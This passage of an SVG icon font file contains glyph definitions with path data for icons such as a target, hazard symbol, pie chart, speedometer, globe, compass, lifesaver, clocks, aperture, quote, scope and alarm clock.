0.832 22.592-6.016 6.528-16.192 6.88-22.592 0.832l-133.12-123.552v415.776c0 126.368-98.4 225.344-224 225.344-136.064 0-224-88.448-224-225.344v-65.632c-168.16-16.256-256-160.096-256-302.368 0-147.36 100.928-304 288-304h768c161.504 0 288 133.536 288 304 0 201.728-145.824 296.896-257.344 304.576z" />
<glyph unicode="&#xe04e;" glyph-name="target2" horiz-adv-x="1344" d="M1336.928 541.12c-7.2 6.048-17.984 5.088-24.064-2.176l-75.744-90.88c-1.632 0.512-3.296 1.024-5.12-0.064h-44.512l56.64 69.056c6.048 7.264 5.056 18.016-2.176 24.064s-18.016 5.088-24.064-2.176l-74.88-90.944h-50.528l56.64 69.056c6.048 7.264 5.056 18.016-2.176 24.064-7.2 6.048-17.984 5.088-24.064-2.176l-74.88-90.944h-24.064c-0.608 282.912-229.984 512-511.936 512-282.304 0-512-229.696-512-512s229.696-512 512-512c271.136 0 493.12 212.032 510.336 480h25.696l74.88-90.944c3.36-4.064 8.256-6.144 13.12-6.144 3.872 0 7.744 1.28 10.944 3.968 7.264 6.016 8.256 16.8 2.176 24.064l-56.672 69.056h50.528l74.88-90.944c3.36-4.064 8.256-6.144 13.12-6.144 3.872 0 7.744 1.28 10.944 3.968 7.264 6.016 8.256 16.8 2.176 24.064l-56.64 69.056h44.512c1.824-1.088 3.488-0.576 5.152-0.064l75.744-90.88c3.36-4.064 8.256-6.144 13.12-6.144 3.872 0 7.744 1.28 10.944 3.968 7.264 6.016 8.256 16.8 2.176 24.064l-70.88 85.056 70.88 85.056c6.048 7.264 5.056 18.048-2.208 24.064zM512-32c-264.672 0-480 215.328-480 480s215.328 480 480 480c264.32 0 479.328-214.72 479.936-480h-96c-0.576 212.32-172.544 384-383.936 384-211.744 0-384-172.256-384-384s172.256-384 384-384c200.576 0 365.472 154.624 382.336 352h96c-17.12-250.336-224.832-448-478.336-448zM767.936 448c-0.576 141.728-115.136 256-255.936 256-141.152 0-256-114.848-256-256s114.848-256 256-256c129.92 0 237.312 97.376 253.6 224h96.704c-16.736-179.712-167.392-320-350.304-320-194.080 0-352 157.92-352 352s157.92 352 352 352c193.728 0 351.36-157.312 351.936-352h-96zM639.904 448c-0.608 71.168-57.664 128-127.904 128-70.592 0-128-57.408-128-128s57.408-128 128-128c59.072 0 108.416 40.416 123.104 96h98.176c-16.096-108.928-109.056-192-221.28-192-123.488 0-224 100.512-224 224s100.512 224 224 224c123.136 0 223.36-99.904 223.936-224h-96.032zM528 416h73.76c-13.536-37.696-48.512-64-89.76-64-52.928 0-96 43.072-96 96s43.072 96 96 96c52.576 0 95.296-42.496 95.904-96h-79.904c-9.44 1.088-17.088-6.56-17.088-16s7.648-17.088 17.088-16z" />
<glyph unicode="&#xe04f;" glyph-name="hazardous" d="M512-65.088c282.944 0 513.088 230.144 513.088 513.088s-230.144 513.088-513.088 513.088-513.088-230.144-513.088-513.088 230.144-513.088 513.088-513.088zM512 926.912c264.064 0 478.912-214.848 478.912-478.912s-214.848-478.912-478.912-478.912-478.912 214.848-478.912 478.912 214.848 478.912 478.912 478.912zM319.584 114.752c2.688-1.568 5.632-2.272 8.576-2.272 5.792 0 11.392 2.912 14.624 8.224l169.216 278.368 169.248-278.368c3.232-5.312 8.832-8.224 14.624-8.224 2.944 0 5.888 0.704 8.576 2.272 124.256 71.904 192.672 184.576 192.672 317.248 0 9.44-7.648 17.088-17.088 16h-339.104l169.952 310.176c4.48 8.16 1.632 18.4-6.432 23.072-117.248 67.808-267.648 67.808-384.832 0-8.096-4.64-10.944-14.912-6.464-23.072l169.92-310.176h-339.072c-9.44 1.088-17.088-6.56-17.088-16 0-132.672 68.416-245.344 192.672-317.248zM862.464 416c-5.408-108.576-61.888-200.576-160.832-262.976l-159.232 262.976h320.064zM672.64 759.648l-160.64-292.16-160.608 292.16c99.392 51.456 221.792 51.456 321.248 0zM481.6 416l-159.2-262.976c-98.976 62.368-155.456 154.368-160.864 262.976h320.064z" />
<glyph unicode="&#xe050;" glyph-name="piechart" d="M928 399.424c0 8.832-7.168 16-16 16h-432v432.576c0 8.832-7.168 16-16 16-255.84 0-464-207.84-464-463.328 0-264.896 199.776-464.672 464.672-464.672 246.816 0 463.328 216.576 463.328 463.424zM32 400.672c0 232.512 185.184 422.592 416 431.040v-432.288c0-8.832 7.168-16 16-15.424h431.68c-9.056-223.68-206.56-416-431.008-416-246.656 0-432.672 185.984-432.672 432.672zM560 480h447.968c8.832-0.576 16.032 7.168 16.032 16 0 255.84-208.16 464-464 464-8.832 0-16-7.168-16-16v-448.576c0-8.832 7.168-16 16-15.424zM576 927.712c226.016-8.288 408.288-191.040 415.808-416.288h-415.808v416.288z" />
<glyph unicode="&#xe051;" glyph-name="speedometer" d="M512 961.088c-282.912 0-513.12-230.144-513.12-513.088s230.208-513.088 513.12-513.088 513.12 230.144 513.12 513.088-230.208 513.088-513.12 513.088zM512-30.912c-264.064 0-478.88 214.848-478.88 478.912s214.816 478.912 478.88 478.912 478.88-214.848 478.88-478.912-214.816-478.912-478.88-478.912zM528 766.304c9.76 0 17.696 7.904 17.696 17.696v64c0 9.792-7.936 17.696-17.696 17.696s-17.696-7.904-17.696-17.696v-64c0-9.792 7.936-17.696 17.696-17.696zM176 481.696h-64c-9.76 0-17.696-7.904-17.696-17.696s7.936-17.696 17.696-17.696h64c9.76 0 17.696 7.904 17.696 17.696s-7.936 17.696-17.696 17.696zM830.304 464c0-9.792 7.936-17.696 17.696-17.696h64c9.76 0 17.696 7.904 17.696 17.696s-7.936 17.696-17.696 17.696h-64c-9.76 0-17.696-7.904-17.696-17.696zM274.4 635.904c4.544 0 9.056 1.728 12.512 5.184 6.912 6.912 6.912 18.080 0 24.992l-50.4 50.432c-6.912 6.944-18.080 6.944-24.992 0-6.912-6.912-6.912-18.080 0-24.992l50.4-50.4c3.424-3.488 7.968-5.216 12.48-5.216zM764.512 284.512c-6.912 6.944-18.080 6.944-24.992 0-6.912-6.912-6.912-18.080 0-24.992l48-48c3.456-3.456 7.968-5.184 12.512-5.184s9.056 1.728 12.512 5.184c6.912 6.912 6.912 18.080 0 24.992l-48.032 48zM796.512 707.488c6.912 6.912 6.912 18.080 0 24.992-6.912 6.944-18.080 6.944-24.992 0l-50.4-50.4c-6.912-6.912-6.912-18.080 0-24.992 3.456-3.456 7.968-5.184 12.512-5.184s9.056 1.728 12.512 5.184l50.368 50.4zM275.488 268.512l-48-48c-6.912-6.912-6.912-18.080 0-24.992 3.456-3.456 7.968-5.184 12.512-5.184s9.056 1.728 12.512 5.184l48 48c6.912 6.912 6.912 18.080 0 24.992s-18.112 6.912-25.024 0zM624 192h-224c-28.448 1.088-49.12-19.552-49.12-48v-30.624c0-28.736 21.568-51.296 49.12-49.376h224c27.52-1.92 49.12 20.64 49.12 49.376v30.624c0 28.448-20.672 49.088-49.12 48zM638.88 113.376c0-8.224-4.672-17.088-14.88-18.176h-224c-10.24 1.088-14.88 9.984-14.88 0.8v30.624c0 26.848 5.408 32.288 14.88 33.376h224c9.472-1.088 14.88-6.528 14.88-16v-30.624zM512 362.656c22.784 0 44.224 8.864 60.32 24.992 29.152 29.152 32.768 74.24 10.88 107.36l84.896 84.896c6.656 6.688 6.656 17.504 0 24.192-6.688 6.688-17.504 6.688-24.192 0l-84.992-84.992c-32.8 20.96-79.136 17.376-107.232-10.752-33.28-33.28-33.28-87.392 0-120.672 16.096-16.16 37.536-25.024 60.32-25.024zM481.856 478.144c8.032 8.064 18.752 12.512 30.144 12.512s22.112-4.448 30.176-12.512c16.64-16.64 16.64-43.68 0-60.32-16.096-16.128-44.192-16.128-60.32 0-16.64 16.64-16.64 43.712 0 60.32z" />
<glyph unicode="&#xe052;" glyph-name="global" d="M1.088 426.624c11.328-272.352 235.808-490.624 510.912-490.624s499.584 218.272 510.912 490.624c0.608 1.696 1.088 3.456 1.088 5.376 0 1.152-0.416 2.144-0.64 3.2 0.096 4.288 0.64 8.48 0.64 12.8 0 282.304-229.696 512-512 512s-512-229.696-512-512c0-4.32 0.544-8.512 0.64-12.8-0.224-1.056-0.64-2.048-0.64-3.2 0-1.92 0.48-3.68 1.088-5.376zM797.472 232.256c-42.208 17.664-87.52 31.328-134.88 40.672 5.056 46.496 8.032 94.784 8.96 143.040h159.36c-2.912-65.728-14.592-127.776-33.44-183.712zM862.88 416h127.488c-5.952-89.792-36.416-172.896-85.216-242.528-24.288 17.056-50.464 32.608-78.624 46.080 20.64 59.808 33.344 126.176 36.352 196.448zM396.448 246.848c37.696 5.888 76.384 9.152 115.552 9.152s77.856-3.264 115.52-9.152c-22.208-170.72-70.72-278.848-115.52-278.848s-93.312 108.128-115.552 278.848zM445.056-21.248c-88.032 28.224-162.496 111.072-207.424 223.488 39.872 16.8 82.752 29.92 127.68 38.944 14.688-111.872 41.536-209.344 79.744-262.432zM392.768 617.312c38.944-6.016 78.88-9.312 119.232-9.312s80.288 3.296 119.232 9.312c5.504-51.84 8.768-108.416 8.768-169.312h-256c0 60.896 3.264 117.472 8.768 169.312zM639.52 416c-0.896-48.8-3.776-94.752-8.32-137.312-38.912 6.016-78.816 9.312-119.2 9.312s-80.288-3.296-119.232-9.312c-5.536 52.032-7.584 97.824-8.32 137.312h255.072zM658.72 241.184c44.928-9.024 87.776-22.144 127.68-38.944-44.928-112.416-119.392-195.264-207.424-223.488 38.176 53.088 65.024 150.56 79.744 262.432zM672 448c0 58.752-3.264 118.272-9.408 175.040 47.36 9.344 92.672 23.040 134.88 40.672 21.888-64.928 34.528-138.080 34.528-215.712h-160zM658.72 654.816c-14.72 111.872-41.536 209.376-79.776 262.432 88.032-28.224 162.496-111.072 207.424-223.488-39.872-16.8-82.72-29.952-127.648-38.944zM627.552 649.152c-37.696-5.888-76.384-9.152-115.552-9.152s-77.856 3.264-115.552 9.152c22.24 170.72 70.752 278.848 115.552 278.848s93.312-108.128 115.552-278.848zM365.28 654.816c-44.928 9.024-87.776 22.144-127.68 38.944 44.928 112.416 119.392 195.264 207.424 223.488-38.176-53.088-65.024-150.56-79.744-262.432zM361.408 623.040c-6.144-56.768-9.408-116.288-9.408-175.040h-160c0 77.632 12.64 150.784 34.528 215.744 42.208-17.664 87.52-31.328 134.88-40.704zM352.448 416c0.928-48.256 3.904-96.544 8.96-143.072-47.36-9.344-92.672-23.040-134.88-40.672-18.848 55.936-30.528 117.984-33.44 183.744h159.36zM197.44 219.552c-28.16-13.504-54.304-29.024-78.592-46.080-48.8 69.632-79.264 152.704-85.216 242.528h127.488c3.008-70.272 15.712-136.64 36.32-196.448zM138.016 147.84c21.92 15.328 45.344 29.504 70.624 41.76 32.128-79.52 78.368-145.536 133.952-190.176-80.832 30.656-151.328 82.176-204.576 148.416zM681.408-0.544c55.616 44.608 101.824 110.656 133.952 190.176 25.28-12.288 48.704-26.432 70.624-41.76-53.248-66.272-123.744-117.792-204.576-148.416zM864 448c0 82.144-13.696 159.584-37.44 228.448 28.16 13.504 54.336 29.024 78.624 46.080 54.528-77.888 86.816-172.448 86.816-274.528h-128zM886.016 748.16c-21.92-15.328-45.344-29.472-70.624-41.76-32.128 79.52-78.368 145.568-133.952 190.176 80.8-30.656 151.296-82.176 204.576-148.416zM342.592 896.544c-55.616-44.608-101.824-110.656-133.952-190.176-25.312 12.288-48.704 26.464-70.624 41.792 53.248 66.24 123.744 117.76 204.576 148.384zM118.848 722.528c24.256-17.056 50.432-32.576 78.592-46.080-23.744-68.864-37.44-146.304-37.44-228.448h-128c0 102.080 32.288 196.64 86.848 274.528z" />
<glyph unicode="&#xe053;" glyph-name="compass3" d="M0 448c0-282.304 229.696-512 512-512s512 229.696 512 512-229.696 512-512 512-512-229.696-512-512zM512 928c264.672 0 480-215.328 480-480s-215.328-480-480-480-480 215.328-480 480 215.328 480 480 480zM512 32c229.376 0 416 186.624 416 416s-186.624 416-416 416-416-186.624-416-416 186.624-416 416-416zM480 830.368v-48.832c0-8.832 7.168-16 16-16s16 7.168 16 16v50.464c200.928 0 366.016-155.2 382.368-352h-48.864c-8.832 0-16-7.168-16-16s7.168-16 16-16h50.496c0-211.744-172.256-384-384-384v50.464c0 8.832-7.168 16-16 16s-16-7.168-16-16v-48.832c-196.768 16.352-352 181.408-352 382.368h50.496c8.832 0 16 7.168 16 16s-7.168 16-16 16h-48.864c15.456 186.208 164.16 334.912 350.368 350.368zM300.352 222.688c3.264 0 6.528 0.992 9.344 3.008l179.648 129.152c7.296-1.792 14.816-2.976 22.656-2.976 52.928 0 96 43.072 96 96 0 7.584-1.12 14.88-2.784 21.984l131.392 182.784c4.576 6.368 3.872 15.136-1.664 20.672-5.504 5.536-14.272 6.176-20.672 1.696l-184.896-132.896c-5.664 1.056-11.456 1.76-17.408 1.76-52.928 0-96-43.072-96-96 0-6.24 0.704-12.352 1.856-18.272l-130.464-181.568c-4.576-6.368-3.872-15.136 1.664-20.672 3.104-3.072 7.2-4.672 11.328-4.672zM448 447.84c0 35.296 28.704 64 64 64s64-28.704 64-64-28.704-64-64-64-64 28.736-64 64zM653.568 591.904l-63.584-88.48c-6.912 9.632-15.424 18.016-25.344 24.544l88.928 63.936zM432.16 394.656c6.368-9.536 14.528-17.696 23.776-24.416l-85.504-61.472 61.728 85.888z" />
<glyph unicode="&#xe054;" glyph-name="lifesaver" d="M183.616 870.528l-94.176-94.144c-6.24-6.272-6.24-16.384 0-22.624 3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672l94.176 94.144c6.24 6.24 6.24 16.384 0 22.624s-16.384 6.24-22.656 0zM911.872 142.304l-94.176-94.144c-6.24-6.24-6.24-16.384 0-22.624 3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672l94.176 94.144c6.24 6.24 6.24 16.384 0 22.624s-16.416 6.272-22.656 0zM852.864 864.256c-6.24 6.24-16.384 6.24-22.624 0s-6.24-16.384 0-22.624l87.904-87.872c3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-87.936 87.872zM95.744 129.76c-6.24-6.24-6.24-16.384 0-22.624l87.904-87.872c3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-87.904 87.872c-6.304 6.24-16.416 6.24-22.656 0zM145.024 644.48c-6.528-12.16-12.192-24.672-17.408-37.248-41.888-101.248-41.92-217.312-0.032-318.464 6.464-15.584 13.664-30.496 21.376-44.256 18.656-33.312 41.792-63.872 68.736-90.816 30.848-30.88 66.208-56.608 105.088-76.448 9.856-5.024 19.872-9.472 30.016-13.664 50.624-20.96 104.192-31.584 159.2-31.584s108.576 10.624 159.232 31.584c0.032 0 0.032 0.032 0.064 0.064 12.576 5.184 25.024 10.88 37.152 17.376 36 19.264 68.928 43.712 97.856 72.672 28.928 28.896 53.376 61.824 72.672 97.888 6.496 12.16 12.224 24.608 17.44 37.248 0 0 0 0.032 0 0.032 41.824 101.216 41.824 217.248-0.032 318.368-4.192 10.112-8.672 20.192-13.664 30.016-19.808 38.848-45.536 74.176-76.448 105.088-26.912 26.912-57.44 50.016-90.784 68.704-13.728 7.712-28.64 14.944-44.288 21.408-101.216 41.888-217.056 41.888-318.432-0.032 0 0-0.032 0-0.032 0-12.64-5.248-25.088-10.912-37.248-17.44-35.968-19.264-68.864-43.712-97.792-72.672-28.928-28.896-53.408-61.792-72.672-97.824zM451.2 594.752c0 0 0 0 0 0 13.824 5.696 28.064 9.44 42.304 11.104 14.912 1.76 30.048 1.376 44.864-1.12 11.776-1.952 23.36-5.28 34.464-9.824 0 0 0 0 0.032 0 19.328-8 36.672-19.584 51.552-34.464 14.752-14.752 26.304-32.096 34.336-51.584 0 0 0 0 0-0.032 0 0 0 0 0 0 6.752-16.352 10.72-33.344 11.84-50.56 0.608-9.504 0.352-19.168-0.736-28.672-1.664-14.272-5.376-28.512-11.104-42.304 0 0 0 0 0 0s0 0 0-0.032c-8.032-19.488-19.584-36.832-34.336-51.584-14.72-14.72-32.096-26.272-51.616-34.336 0 0 0 0 0 0-13.824-5.664-28.064-9.44-42.304-11.072-9.504-1.12-19.072-1.376-28.704-0.736-17.184 1.088-34.208 5.088-50.592 11.84-19.52 8.064-36.896 19.616-51.616 34.336-14.88 14.88-26.464 32.192-34.464 51.552-4.576 11.072-7.904 22.688-9.888 34.496-2.496 14.88-2.848 29.984-1.12 44.832 1.664 14.272 5.376 28.512 11.104 42.304 0 0 0 0 0 0s0 0 0 0.032c8.032 19.488 19.584 36.832 34.336 51.584 14.752 14.624 32.128 26.176 51.648 34.24zM872.672 580.064c30.912-84.736 30.912-179.328 0-264.128l-178.816 74.048c3.808 11.776 6.4 23.776 7.808 35.84 1.344 11.392 1.632 23.008 0.896 34.432-0.992 15.456-3.904 30.784-8.704 45.728l178.816 74.080zM323.712 416.352c1.504-8.928 3.648-17.76 6.368-26.368l-178.752-74.080c-30.912 84.736-30.88 179.328 0.032 264.128l178.784-74.048c-3.808-11.776-6.4-23.776-7.808-35.808-2.048-17.856-1.632-35.968 1.376-53.824zM240.32 176.32c-24.864 24.864-46.208 53.056-63.456 83.84-4.672 8.32-9.12 17.056-13.312 26.176l178.752 74.016c8.992-17.472 20.64-33.344 34.656-47.392 13.952-13.984 29.888-25.568 47.456-34.56l-74.112-178.912c-4.352 1.984-8.672 4.064-12.992 6.24-35.872 18.368-68.512 42.080-96.992 70.592zM379.936 87.328l74.080 178.848c14.944-4.8 30.272-7.712 45.696-8.704 11.456-0.672 22.976-0.48 34.496 0.896 12.032 1.408 24 4.032 35.776 7.808l74.080-178.848c-84.576-30.976-179.552-30.976-264.128 0zM783.68 176.32c-26.688-26.72-57.088-49.28-90.368-67.104-6.464-3.456-13.024-6.688-19.648-9.728l-74.112 178.912c17.6 8.992 33.504 20.576 47.456 34.56 13.984 13.952 25.568 29.888 34.56 47.456l178.88-74.080c-3.040-6.656-6.24-13.216-9.728-19.68-17.76-33.28-40.32-63.648-67.040-90.336zM783.68 719.68c28.544-28.544 52.256-61.152 70.56-97.024 2.208-4.288 4.256-8.608 6.272-12.992l-178.912-74.080c-9.024 17.568-20.576 33.504-34.56 47.456-14.048 14.048-29.952 25.696-47.424 34.688l74.080 178.752c9.152-4.224 17.92-8.672 26.208-13.344 30.752-17.248 58.944-38.592 83.776-63.456zM644.096 808.672l-74.080-178.784c-8.64 2.752-17.472 4.864-26.368 6.368-17.696 3.008-35.84 3.456-53.856 1.344-12.032-1.408-24-4.032-35.776-7.808l-74.080 178.848c84.64 31.008 179.584 31.008 264.16 0.032zM330.656 786.784c6.464 3.456 13.024 6.688 19.68 9.696l74.080-178.88c-17.6-8.992-33.504-20.608-47.456-34.56-13.984-13.952-25.568-29.888-34.56-47.456l-178.88 74.080c3.008 6.656 6.208 13.216 9.696 19.68 17.824 33.28 40.384 63.648 67.104 90.336 26.688 26.72 57.088 49.28 90.336 67.104zM749.376 30.688c-146.432-83.424-328.352-83.424-474.784 0-7.712 4.352-17.472 1.728-21.824-6.016-4.384-7.648-1.696-17.44 5.984-21.824 78.112-44.512 165.664-66.72 253.248-66.72s175.136 22.208 253.248 66.72c7.68 4.384 10.368 14.144 5.984 21.824-4.416 7.744-14.176 10.368-21.856 6.016zM66.88 701.216c-88.992-156.192-88.992-350.24 0-506.432 2.944-5.184 8.352-8.096 13.92-8.096 2.688 0 5.408 0.672 7.904 2.080 7.68 4.384 10.368 14.144 5.984 21.824-83.424 146.432-83.424 328.384 0 474.816 4.384 7.648 1.696 17.44-5.984 21.824-7.712 4.32-17.472 1.664-21.824-6.016zM957.12 194.784c88.992 156.192 88.992 350.24 0 506.432-4.384 7.68-14.208 10.336-21.824 6.016-7.68-4.384-10.368-14.144-5.984-21.824 83.424-146.432 83.424-328.384 0-474.816-4.384-7.648-1.696-17.44 5.984-21.824 2.496-1.408 5.216-2.080 7.904-2.080 5.568 0 10.976 2.912 13.92 8.096zM274.624 865.312c146.432 83.424 328.352 83.424 474.784 0 2.496-1.408 5.216-2.080 7.904-2.080 5.568 0 10.976 2.912 13.92 8.096 4.384 7.648 1.696 17.44-5.984 21.824-156.224 88.992-350.24 88.992-506.464 0-7.68-4.384-10.368-14.144-5.984-21.824 4.352-7.712 14.112-10.304 21.824-6.016z" />
<glyph unicode="&#xe055;" glyph-name="clock3" d="M512-64c282.304 0 512 229.696 512 512s-229.696 512-512 512-512-229.696-512-512 229.696-512 512-512zM512 928c264.672 0 480-215.328 480-480s-215.328-480-480-480-480 215.328-480 480 215.328 480 480 480zM641.952 263.424c3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-152.608 152.576v223.168c0 8.832-7.168 16-16 16s-16-7.168-16-16v-229.792c0-4.256 1.696-8.32 4.672-11.328l157.28-157.248zM96 448c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM864 448c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM480 832c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM480 64c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM224 704c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM736 192c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM768 704c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM224 192c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32z" />
<glyph unicode="&#xe056;" glyph-name="aperture" d="M512-64c282.304 0 512 229.696 512 512s-229.696 512-512 512-512-229.696-512-512 229.696-512 512-512zM246.72 847.68c-28.064-75.648-42.016-153.888-39.872-233.184 1.6-57.536 11.424-115.168 29.344-171.36 13.92-43.52 32.096-84.96 54.112-123.136 3.52-6.144 7.2-12.192 10.912-18.176 3.040-4.864 8.256-7.552 13.6-7.552 2.912 0 5.824 0.768 8.448 2.4 7.488 4.672 9.824 14.528 5.152 22.016-3.52 5.696-7.008 11.456-10.4 17.312-20.832 36.192-38.112 75.488-51.328 116.832-16.992 53.344-26.336 108.032-27.84 162.528-2.272 83.456 13.312 165.856 47.136 246.848 1.568 3.84 3.232 7.616 4.896 11.392 66.24 34.56 141.344 54.4 221.12 54.4 76.576 0 148.736-18.464 213.024-50.496-79.36-13.536-153.888-40.544-221.408-82.016-48.992-30.048-94.016-67.424-133.728-111.072-30.784-33.76-57.568-70.272-79.584-108.416-3.552-6.144-7.008-12.352-10.304-18.592-4.16-7.808-1.184-17.504 6.624-21.632 2.368-1.28 4.96-1.888 7.488-1.888 5.728 0 11.264 3.104 14.112 8.512 3.136 5.888 6.368 11.744 9.76 17.6 20.864 36.192 46.304 70.784 75.52 102.88 37.728 41.408 80.416 76.832 126.848 105.376 71.2 43.68 150.336 71.392 235.328 82.304 4.672 0.64 9.376 1.152 14.080 1.696 125.344-80.224 210.816-216.832 220.704-373.952-51.392 61.92-112.032 112.96-181.696 150.688-50.624 27.424-105.504 47.712-163.104 60.288-51.84 11.36-104.064 16.192-154.976 14.336-8.8-0.352-15.712-7.744-15.392-16.608 0.32-8.64 7.392-15.392 16-15.392 0.192 0 0.384 0 0.608 0 47.872 1.792 97.728-2.816 146.976-13.6 54.624-11.936 106.688-31.2 154.656-57.152 73.44-39.808 136.992-94.496 190.656-164.832 2.304-2.976 4.512-6.016 6.752-9.024-6.88-157.888-89.856-296.256-213.664-378.688 28.064 75.648 42.016 153.888 39.872 233.184-1.6 57.536-11.424 115.168-29.344 171.36-13.92 43.52-32.096 84.96-54.112 123.136-3.52 6.144-7.2 12.192-10.912 18.176-4.672 7.52-14.56 9.76-22.016 5.152-7.488-4.672-9.824-14.528-5.152-22.016 3.52-5.696 7.008-11.456 10.4-17.312 20.832-36.192 38.112-75.488 51.328-116.832 16.992-53.344 26.336-108.032 27.84-162.528 2.272-83.424-13.312-165.856-47.136-246.848-1.6-3.808-3.232-7.616-4.896-11.392-66.272-34.56-141.376-54.4-221.152-54.4-76.576 0-148.736 18.464-213.024 50.496 79.328 13.536 153.888 40.544 221.408 82.016 49.056 30.112 94.048 67.488 133.728 111.072 30.816 33.792 57.6 70.272 79.584 108.448 3.552 6.144 7.008 12.352 10.304 18.592 4.16 7.808 1.184 17.504-6.624 21.632-7.744 4.16-17.504 1.152-21.632-6.624-3.136-5.888-6.368-11.744-9.76-17.6-20.864-36.192-46.304-70.784-75.552-102.88-37.632-41.376-80.32-76.8-126.816-105.376-71.2-43.68-150.336-71.392-235.328-82.304-4.672-0.64-9.376-1.152-14.080-1.696-125.344 80.224-210.816 216.832-220.704 373.952 51.392-61.92 112.032-112.96 181.696-150.688 50.624-27.424 105.504-47.712 163.104-60.288 44.64-9.824 89.6-14.752 133.696-14.752 7.136 0 14.176 0.128 21.28 0.384 8.8 0.352 15.712 7.744 15.392 16.608-0.32 8.8-6.56 16.16-16.608 15.392-47.808-1.824-97.728 2.816-146.976 13.6-54.624 11.936-106.688 31.2-154.656 57.152-73.44 39.808-136.992 94.496-190.656 164.832-2.304 2.976-4.512 6.016-6.752 9.024 6.912 157.888 89.92 296.256 213.696 378.688z" />
<glyph unicode="&#xe057;" glyph-name="quote" d="M512-64c282.304 0 512 229.696 512 512s-229.696 512-512 512-512-229.696-512-512 229.696-512 512-512zM512 928c264.672 0 480-215.328 480-480s-215.328-480-480-480-480 215.328-480 480 215.328 480 480 480zM343.488 523.328c16.224-5.28 33.088-2.848 48.992 7.104 7.456 4.672 9.76 14.56 5.056 22.048-4.672 7.456-14.528 9.76-22.048 5.056-7.712-4.8-15.136-6.016-22.016-3.808-7.328 2.4-14.24 8.576-20.032 17.856-5.184 8.256-6.848 18.048-4.672 27.552 2.208 9.536 7.968 17.6 16.256 22.784 19.776 12.48 45.504 5.344 62.176-7.168 28.192-21.088 40.8-57.76 40.8-118.752 0-90.048-40.96-202.016-119.264-241.728-7.872-4-11.040-13.632-7.040-21.536 2.88-5.536 8.48-8.736 14.304-8.736 2.432 0 4.896 0.576 7.264 1.728 93.92 47.648 136.736 173.536 136.736 270.272 0 71.104-17.024 116.96-53.6 144.384-30.464 22.944-70.016 26.368-98.336 8.672-15.52-9.696-26.336-24.864-30.432-42.72-4.128-17.856-1.024-36.224 8.672-51.712 9.824-15.68 22.656-26.496 37.184-31.296zM599.488 523.328c16.192-5.28 33.088-2.848 48.992 7.104 7.456 4.672 9.76 14.56 5.056 22.048-4.672 7.456-14.528 9.76-22.048 5.056-7.68-4.8-15.136-6.016-22.016-3.808-7.328 2.4-14.24 8.576-20.032 17.856-5.184 8.256-6.848 18.048-4.672 27.552 2.208 9.536 7.968 17.6 16.256 22.784 19.808 12.48 45.536 5.344 62.176-7.168 28.192-21.088 40.8-57.76 40.8-118.752 0-90.048-40.96-202.016-119.264-241.728-7.872-4-11.040-13.632-7.040-21.536 2.88-5.536 8.48-8.736 14.304-8.736 2.432 0 4.896 0.576 7.264 1.728 93.92 47.648 136.736 173.536 136.736 270.272 0 71.104-17.024 116.96-53.6 144.384-30.464 22.944-70.016 26.368-98.336 8.672-15.52-9.696-26.336-24.864-30.432-42.72-4.128-17.856-1.024-36.224 8.672-51.712 9.824-15.68 22.656-26.496 37.184-31.296z" />
<glyph unicode="&#xe058;" glyph-name="scope" d="M544 752c0 8.832-7.168 16-16 16s-16-7.168-16-16v-272h-304c-8.832 0-16-7.168-16-16s7.168-16 16-16h304v-303.008c0-8.832 7.168-16 16-16s16 7.168 16 16v303.008h303.008c8.832 0 16 7.168 16 16s-7.168 16-16 16h-303.008v272zM1009.984 480h-83.616c-15.616 203.84-178.528 366.752-382.368 382.368v81.632c0 8.832-7.168 16-16 16s-16-7.168-16-16v-80c-218.56 0-397.92-169.568-414.368-384h-79.648c-8.832 0-16-7.168-16-16s7.168-16 16-16h78.016c0-229.376 186.624-416 416-416v-80c0-8.832 7.168-16 16-16s16 7.168 16 16v81.632c214.432 16.448 384 195.808 384 414.368h81.984c8.832 0 16 7.168 16 16s-7.136 16-16 16zM512 64c-211.744 0-384 172.256-384 384s172.256 384 384 384 384-172.256 384-384-172.256-384-384-384z" />
<glyph unicode="&#xe059;" glyph-name="alarmclock" horiz-adv-x="960" d="M480 896c-247.040 0-448-200.96-448-448s200.96-448 448-448 448 200.96 448 448-200.96 448-448 448zM480 32c-229.376 0-416 186.624-416 416s186.624 416 416 416 416-186.624 416-416-186.624-416-416-416zM240 960c-132.352 0-240-107.648-240-240v-33.984c0-8.832 7.168-16 16-16s16 7.136 16 16v33.984c0 114.688 93.312 208 208 208h28c8.832 0 16 7.168 16 16s-7.168 16-16 16h-28zM716 960h-28c-8.832 0-16-7.168-16-16s7.168-16 16-16h28c114.688 0 208-93.312 208-208v-33.984c0-8.832 7.168-16 16-16s16 7.168 16 16v33.984c0 132.352-107.648 240-240 240zM480 438.624v223.168c0 8.832-7.168 16-16 16s-16-7.168-16-16v-229.792c0-4.256 1.696-8.32 4.672-11.328l157.248-157.248c3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-152.576 152.576zM60.8-57.6l96 128c5.28 7.072 3.84 17.088-3.232 22.4-7.040 5.248-17.056 3.84-22.4-3.232l-96-128c-5.28-7.072-3.84-17.088 3.232-22.4 2.88-2.144 6.272-3.168 9.6-3.168 4.832 0 9.664 2.208 12.8 6.4zM828.8 89.6c-5.344 7.104-15.328 8.48-22.4 